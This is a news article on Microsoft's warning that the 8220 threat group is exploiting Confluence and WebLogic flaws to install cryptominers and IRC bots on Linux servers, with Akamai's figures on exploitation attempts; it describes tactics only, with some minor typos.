Microsoft Warns Against Cryptomining Malware Campaign Targeting Linux Servers


A cloud threat group, followed as 8220, has updated its malware toolset to breach Linux servers with the aim of installing cryptominers as part of a long-running campaign.

“The updates include the deployment of new versions of a cryptominer and an IRC bot,” Microsoft Security Intelligence said in a series of tweets on Thursday. “The group has been actively updating its techniques and payloads over the past year.”

8220, active since early 2017is a Chinese-speaking, Monero mining threat actor, so named because of his preference to communicate with command-and-control (C2) servers over port 8220. It is also the developer of a tool called whatMiner, which was co-opted by the Rocke cybercrime group in their attacks.

In July 2019, Alibaba Cloud Security Team uncovered an additional shift in the opponent’s tactics, through the use of rootkits to hide the mining program. Two years later, the gang resurfaced with Tsunami IRC botnet variants and a custom “PwnRig” miner.

According to Microsoft, the latest campaign affecting i686 and x86_64 Linux systems has now been observed to exploit remote code executions for the freshly revealed Atlassian Confluence Server (CVE-2022-26134) and Oracle WebLogic (CVE-2019-2725 ) for first access .

This step is followed by retrieving a malware loader from a remote server designed to drop the PwnRig miner and an IRC bot, but not before taking steps to evade detection by clearing log files and cloud monitoring and disable security software.

In addition to achieving persistence through a cron job, the loader uses the IP port scanner tool ‘masscan’ to find other SSH servers on the network, then uses the GoLang-based SSH brute force tool’ spirit’ to distribute,” Microsoft said.

The findings come as Akamai revealed that the Atlassian Confluence flaw is witnessing a steady 20,000 exploit attempts a day launched from approximately 6,000 IPs, down from a peak of 100,000 in the immediate aftermath of the bug’s disclosure on June 2, 2022. 67% of the attacks would be from the US

“Trade accounts for 38% of attack activity, followed by high-tech and financial services, respectively,” Akamai’s Chen Doytshman said this week. “These top three verticals make up more than 75% of the business.”

The attacks range from vulnerability studies to determine whether the target system is susceptible to injection of malware such as web shells and cryptominers, the cloud security company noted.

“What is especially concerning is how much of an upward shift this type of attack has amassed in recent weeks,” Doytshman added. “As we’ve seen with similar vulnerabilities, this CVE-2022-26134 will likely continue to be exploited for at least years to come.”